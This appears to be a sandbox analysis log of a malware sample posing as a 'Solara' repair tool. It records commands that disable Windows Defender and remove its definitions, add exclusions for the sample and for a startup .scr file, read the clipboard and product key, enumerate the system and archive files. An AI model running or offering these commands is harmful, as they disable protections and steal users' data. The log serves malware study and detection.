Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand (encoded command omitted)"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand (encoded command omitted)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: python3.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: libffi-7.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: libssl-1_1.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
